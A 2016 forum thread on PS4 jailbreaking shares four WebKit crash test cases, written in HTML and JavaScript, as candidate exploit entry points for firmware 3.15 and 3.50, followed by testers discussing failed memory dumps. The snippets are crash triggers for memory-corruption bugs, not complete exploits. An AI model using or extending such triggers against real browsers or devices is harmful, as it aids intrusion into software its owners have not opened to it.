PS4 Jailbreaking | Thread starter: mcmrc1 | Start date: Apr 10, 2016 at 12:04 PM
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the source code from Sony's WebKit ;)
3. Entry Point:
Code:
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}
</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
[Attachment: PS4 3.15 Firmware Entry Point.png]

Comments

Are you using cturt opensdk? I'm almost certain it's required
So data isn't dumping from the system hmmm makes me think of communication bus error

It prob is. I've got them all thrown into a folder I use as I've been testing...who knows whats in there, but yes real weird. It will say:

Warning: addr not received
and then
Error: dump not received

This tells me it's at least communicating to it, but just not sure why it's not passing through

Well, I can tell you from looking at cturt's code everything is bent to hell, and same with the compilers. Now most benders follow specific rules, and mine is: never do this with compilers when loading to a system; it throws the kernel out of whack, and only specific files should ever be bent.
Wait, that's a call: addr not received because it's incorrect, so if it's calling an incorrect addr no data can be sent or received.

I think you're right. I'll try to see if I can tell where it's pulling from and change that.

Wish I could upload a video. I got the PS4 to beep at me every time it loads a pic through the browser. Kind of funny, ha

Nice, keep up the good work. You should actually see the toolchains used. I'm going through the src codes; it's kinda interesting how they do this: floating points are all done through software now and set through the toolchain.

Alright, sounds good. Did they fix the WiFi bug on 3.50? I know it's on 3.15; that could be useful if you can still access it that way to allow another backend.

I've got a second PS4 running on 3.15fw that I could test with as well, but it's never been logged into PSN. So, to do anything with the browser you have to go the long way. This sucks, so I shelved it for now and am just working with 3.50. Shoot me a link on the WiFi bug so I can read about it, and I'll take a look to see if I can piggyback off this one. I could have worked on this stuff all day, knew I should have taken a sick day today. ha!

It's on here; I will see if I can find it. I know you could also use the tools I have as well, as they also gave without FPGA and compilers and look to use over network for various things, but it is based on bare metal.